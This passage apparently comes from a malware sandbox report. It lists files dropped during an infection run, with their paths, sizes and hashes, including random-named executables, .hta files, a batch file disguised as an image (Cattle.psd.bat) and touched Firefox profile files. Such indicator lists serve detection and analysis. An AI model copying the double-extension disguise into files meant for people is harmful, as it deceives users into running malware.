                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      a28496215ac5f24775cf1776999924d8

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      58246ea3da7480d563ec5af2c0553d1b4e820187

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      61e4ac2e9bc53d47cfb720ffc6107e803a4c594b8f48d3f0d944b7278359d08f

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      f61a5b7f1aa0ad45681ba54aa0ad8043b7222e865a780903b8e3042731127a7b23c2c3ce8764ba94313b77fd9ee05cab67b197ab070dbaac878368f6097f4a3f

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10453950101\e69cb3d1b7.exe

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1.7MB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      4ab61447e1068d01db47d342273aaf03

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      4a4fd1bc54c3e95858a0af7bd6e3685f2c33ee53

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      bee4492ae1097eb4cd9f574b3fe782128f6f8d0ef50ba5e34e7f419288a60bb3

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      7d47c81d009a7b4d163abda5a719d582994e6d1049ca03cc01f9394e7e585232c46af7f03e1e876f778bc82f5d06cdc21d6f5a60be6e49fef5c041452823f5b8

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10453970101\but2.exe

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      3.1MB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      31b30e8113ecec15e943dda8ef88781a

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      a4a126fabb8846c031b3531411635f62f6e6abd7

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      2f0ffc24180fa3b0b0489863860bff2afd3b87604aff55088d529a253fd73ef2

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      55bb425bf612cd7750f85f78cacea7095109a561ddfa86c1ae88339a9deb7e6e930d5bee4dcaf7a206ae7d5b4144338c53be5c3fda94ecf1fbb3ce1a20329140

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10453980101\851bde5a27.exe

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      956KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      83457e01fa40348dfee40d4832d2d09a

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      4f4944f5923de6563e702bba00339ac4d2d70292

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      20da0dcdfbe199c63d3ba34bbc08f5a79c8ee28ad1ae069994da6788a2aced3b

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      e1954f4c2896f148df99937e9c59bdeb11dfcc613931423e6ea9d7fb1edbf77c042d32a8d212b9884907321671145b010310b0ca6fea0708feb690a9ff73414f

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10453990101\larBxd7.exe

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1.2MB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      4641a0bec2101c82f575862f97be861c

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      0dd1ee06cdb7ba9ef2aa1dc44c80f1bc2586d33b

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      fc2ac17498bd7846607110e66426bdad0ab5302f5c7978dd72c20d99166292e1

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      da87190b368b99feafdb6cfb2fe236c94741573f494ca1cc9127f3a34e9112e1c8d4bf794841b4f00d3f083bc8239226d7d6ffecb45eb02299ff4e03e6e3749a

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10454000101\Rm3cVPI.exe

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      354KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      27f0df9e1937b002dbd367826c7cfeaf

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      7d66f804665b531746d1a94314b8f78343e3eb4f

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10454010101\qhjMWht.exe

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      5.8MB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      1dbdcaeaac26f7d34e872439997ee68d

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      18c855f60fb83306f23634b10841655fb32a943b

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      3142aecf9794be2f3894d3e1429d28f80918c5b41d516c9160e7cd3984a6f5a3

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      aa447551d1d44d8b615a3d8a656c4085d024cc72fa9ead0b944c72dd7ff5bdab60fd7829440d9c2b4b2de364ca33d349e5716699e2cefd4835e35bbc7e421535

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10454020101\9sWdA2p.exe

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1.1MB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      5adca22ead4505f76b50a154b584df03

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      8c7325df64b83926d145f3d36900b415b8c0fa65

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      aa7105a237dc64c8eb179f18d54641e5d7b9ab7da7bf71709a0d773f20154778

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      6192d61e777c59aa80c236b2f3e961795b7ff9971327c4e3270803d356ecf38949811df680a372259a9638ccdb90fc1271fb844f1f35656d5b317c96081f396e

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10454030101\TbV75ZR.exe

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1.9MB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      b53f9756f806ea836d98ff3dc92c8c84

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      05c80bd41c04331457374523d7ab896c96b45943

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      73ca9bc319d447e03a717b4f781aca8dc11a5bec82ace59751f285341e4b137c

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      bd776a3f3ae229fb36f54674323ddeea0a631acfc18578860ed282667fcc5047d2b5033aba4f88f5908d909d0969081a94cb1cb3efbb9ecaeff526c0fb2ecddb

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10454040101\UZPt0hR.exe

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      960KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      82c3f3faf7439d39f62cdf8ac8c046d3

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      1ab46009000709de021b231e3b02aa6396025fee

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      14330e04a87150003b90b2c8d27bb3057a9802765d5ca34850b86bcb8d8b7c68

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      18bcd37402f1053d92639f9ee3df58fe2fccd67f4111623ac14f60a0e4625c8815cb7c453129dea7cecc6add6b7cfd33b13d233435be6ae7f6b5e1ec949c4cf7

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\272.exe

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      88KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      89ccc29850f1881f860e9fd846865cad

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      d781641be093f1ea8e3a44de0e8bcc60f3da27d0

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BE2C.tmp\BE2D.tmp\BE2E.bat

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      e5ddb7a24424818e3b38821cc50ee6fd

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      97931d19f71b62b3c8a2b104886a9f1437e84c48

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Bc.wbk

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      24KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      aee7816472439f47b4aa818ff773dc5c

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      a87fbe8ffd5323e789712d19318d2d0e72554a0e

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      1ac3ccd1e88fb7649020227e8ec53d33f8f70f5a1a987f003c4c8846f14e9e9a

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      730f55d5d06acdbc271706aed70e233ae53cd6a4db3c7e186caf02df0c2a385ac605199f78b9c46c5bd1cdaf52cb9efdd8b8c71f5673e791d696ae7a17beb433

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Cattle.psd.bat

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      11KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      ec90ed340e87d540b3b2bfd46026424c

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      94d88488e005158000815c918c59e868f221a1c6

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      80f117d62a42a9c74efb37e180cc85796f56e3eedc76c5b8962837fb964f32e0

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      57d231bae221e173fb8707638292ab69fd222760c4da4404dea0c392e442d53f92381ef23608c4e4caa1c779b987e20b98a50d2c2b96c0354fda2700ad6388d6

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3egozpm4.25k.ps1

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      60B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\mYd5F82Ba.hta

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      717B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      1429c5de862f783618fd1fc9ac7c509c

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      eef68764a21551905f361f2c678cd11a6ece1a60

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      b49f0f48356c9717ca161879cdf682dde3c7568bcaf757b34c18988216b5e00b

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      2f10620298b032d383b83698e496b0100a87b8eb610f6d52c012c0886b2183f5e85c3bb130e443e481c61ca3cf1da6bcb2f4bb4230bbf0c8ff712e0fc1f58079

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\rAQDUTUMO.hta

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      717B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      6a628811ebb26903e736ec1319c71623

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      43042e0c1f88f7b2bd572d8857de9d011f22cca9

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      cf8964a6a3ea0730c2b44c03fa7c97b543f23e2db3a53c20246cb3d754afae6e

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      454d928f09e093c1aa9bb5a733900f78c4c5ff3187110d477ed2ba86ff55727c903363a20889657604f3dae6beef94063097ad7ce5c52595de9ccfab33cf941f

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      11KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      25e8156b7f7ca8dad999ee2b93a32b71

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      db587e9e9559b433cee57435cb97a83963659430

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      1211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      502KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      e690f995973164fe425f76589b1be2d9

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      e947c4dad203aab37a003194dddc7980c74fa712

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      87862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      77991110c1d195616e936d27151d02e4d957be6c20a4f3b3511567868b5ddffc6abbfdc668d17672f5d681f12b20237c7905f9b0daaa6d71dcdac4b38f2448b2

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      9.2MB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      4c7d3da7db3e73303b1523cd3a5f0560

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      42b820a16e2086c16bc0a5dfb96e92706be8733c

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      acb207584ca5a83e037e57a787289d8037b84c6e6b9415ddf5a4c39b0f8cb24f

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      3983e8340324b3ea8291c96ebac1d5370e86c687b72545af71d092677e135ceac51b42877487d573d69238001804895bbf2635f26128487bdfceb68ae8d040d6

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\3FKgMSQ1MX.exe

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      3.0MB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      8420e9095fc9159b484175e37d6f5cc3

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      1c9f8ef274308a712b981976f23394e53bc4517d

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      ecfefcdb438a069e5ae1349897df3b7a7f515ab26bed5fcb7f2e426a70216eb5

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      64da3cfd1d2d528a26a24747836996fc26b5e1d79603c75e5e84b9fd0432446dac3e1cdc37c239c7092656d1d3cbdce80609e299737b9aeda21c6f87cb798b93

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\AlternateServices.bin

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      17KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      68b8ed9e76e88c2388e43300def20bc5

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      5766777258e377af998dd5b9a910b87dd8104b52

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      00999e7ec315eca1a6727a2526d7938397dfdb343f802538b233e40957523385

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      720e06dc6e834b9a8b61aa0985a7d07b14d62bb9b8341750193536e021c74c90c7d7b991330c3c00150ed16ec785c807c4a59db4a3fdbebdd7d529d05a2376ca

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\AlternateServices.bin

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      0466dbf55ba5a513c82ef3d55cc31252

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      07504a57579457bc3f56815fec812d59bb7e06f3

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      edf60553785d56bdfe556f476cb35d6989547c9bedd4a2991ef891bb266134e4

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      64b07bab4fbf3d80c1d8ed6c9224337ce06ddb3a83de2f80e1c9f867075af69312695f67cb191eddaf7629cbd26372de48494f0fb11b3273fecf46f5237d55ff

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      6KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      b1c415f19a255d4464f4ee8bacb3b7c3

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      7d1fde83896666a75b301414041d869cb09432d3

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      9407f0614f5fcc35bdb363bea9354ec8794997fbe10b5d5c87085864e8763a1b

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      53723b7da952ee6cf152431dc1509b11157ab745b37787f449aac5e0b3e5c516855ed9472c502b4fdb7304f495d5a8b6bfd7d81166b59366193d78a520ea8f5f

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      6KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      2d501b56a95f4f54f66e05070c55ea8b

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      d414f858728b1521b44624cff0d8264ce3e5eb94

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      c91ac0cb53e7c26bd1c8d48f014a09d5a5086b22151d03bc28264b19a6e5ed5f

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      13ce69876c2f65cb699621ba263bcbe6de5dd059b5feddf41b660d41ebaa7d07608a3af8ee465ca98f4a982c93d8da4ff410ec2e4ae3d636d9245f1651e43f69

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      31KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      2bb3140c977831458550bec1fe68b4b6

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      680c8e6810c27d67b57ed0aa682a092eca5d9d76

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      7a0f1a78b10a8c79d5d576ef6d09dba236bca899369f0255a29a450094f34e89

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      60d91740098fdfb1fb447f1b6be90081a61f06856bc79cba72fa57f50c5a6927c549c54ff272e641e9eb12cb8f8c4c3621c90b1f6f4854df3a5035843c074fc0

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\events\events

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      b0a23ee6ad6432cda951f3ed158d8373

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      8fe01124722047f188ce714d01505694ba664db5

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      b652c1b727ccb5802341079e0087f3bb74b7f3babf13e905f5e63db1efb3d386

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      a193d541d5fb91315970e1e16977979b0e7dc961c7ed1658c5c9326e96385d5205f2fded3c628a54e641a7f35ae1c20e87701542c5b46bc8a0b3e016c080bf96

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\pending_pings\272d3e29-a693-4c58-bfd9-a014528c7bf1

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      16KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      b0014d4ed6c5866e9d7fddea29413b4a

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      5234e2ec542d9b2b96ff8c02e3ffa0c78d83308a

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      fed6ba5775100afdeb415f3a7a36f736d84bcde872e46562f0430c04aa47d8fb

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      38c029bb82c1347c61154eea92abf2509b3a66b467ee26c924ebe16111ec19e29f1d915b031872dfc7b7f42c028aeada2b83197f70b00f4bc1dd7b8a09edc8e5

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\pending_pings\32473615-1f4c-4d3d-8f6f-14af7958317b

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      615d58209ff277230631aeec38d81125

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      3be0bd94ac9da4e27f4c5df5f44e7a9907ca3d94

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      43db948ba51558943a5320e894751b87f59fc7e57fb56295dcb48db0c32d483e

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      4a890096d7a20caf2c0f6014035a27ea2a83cfa769017c5b913da199ec3e38272038c092d19af132d001c8e48a9579386c74cff9d2e41b9dc87cdf7db5764217

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\pending_pings\37a42cc4-5cbe-4956-baf6-0e58f0ba63af

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      235B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      0621d767bf96b12f07074783606af56e

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      173c4a089cec836bb97270e7973734a2e8cd520e

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      6ec1ddb2c0d9e66dac0cdda2a94c488dbcecdbfa5961af47ae4424df6a2c4cab

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      3268b74799b9388df9ca89ab3b9210712ea9495713008d05d86422db055684d749b347eb275c364e15dd8c0b5cdb6258d035917168486f92ef86741f42381e26

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\pending_pings\3cb3c99f-765d-4965-9933-8f261894b382

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      886B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      9198184b6c6daad0bed8e5a0aa9058d5

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      2dab7fd1b3e9ef20dd301c84e14ee2a2e1c56396

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      e59ddd3c46321ba965f5b2789609630f0037563edddf40e676bf0b52dbf71d10

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      54f1ac6bb9ea8978b114d5d73d729775663355121ace8936f1a0e23b4bbea988413640946ce44985ee750eb3bee79f55ab4bca05e1f4107d43fe102f3a18a65f

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\pending_pings\5c782420-cfe1-473b-833a-0841b3fe0d00

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      883B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      f3c49da6d851870feac5ea45a4f5f51c

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      c46ea5d156cbf5bc6ac758eadb7fe63803248343

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      d2600fb287aa21c0b0f3813c5b23b1788c71b5a737551347a8d3c61abed85285

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      204130490a59cb2adb66d09e9ffa0e7f90bb4163d1cb77348646902233408cfe074baf7b647b5fb168a1a5c65d1dbcb89ebb3cb6eb220c9d7d147fdc434aa7a1

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\datareporting\glean\pending_pings\6d141fad-1c4e-4441-848d-cb91f913c512

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      235B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      d5907eaffc0b8c8550daad8bd4b88f44

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      f990db82f5ab62bcfa5e49bf214cec07256e41db

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      5a99ad9353e67c1c439fbcd5efd71d1a86cd8b7bcc9504ff9d6521b19c206f45

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      d7fe83e4e203ec96ad99596e204832244781c845ce236f4da9be173aa0956246b6c5a3ee13b8885b9bd5c575bfa94d344dcaecd3a1b8466afc9bddfe00ce24a6

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\mpvc2cwh.default-release\extensions.json

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      16KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      0a6a5ff6dcfac40c0f49b935d9fab547

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      041cb97796fc36dc6ec4c704b8ab736b2cede5af

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      ae48e08648a16e928da2449271b88f0a191f68af9bf7a5a6a831b23dd7370b56

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      48e31962b7d6b18af212a4a609e3bb4c55d847fe71dba45753c8168fec0274421644475f1ff92643ba1a8b66f461ca4ead800fe67194a513cf5dc482d3f4b831

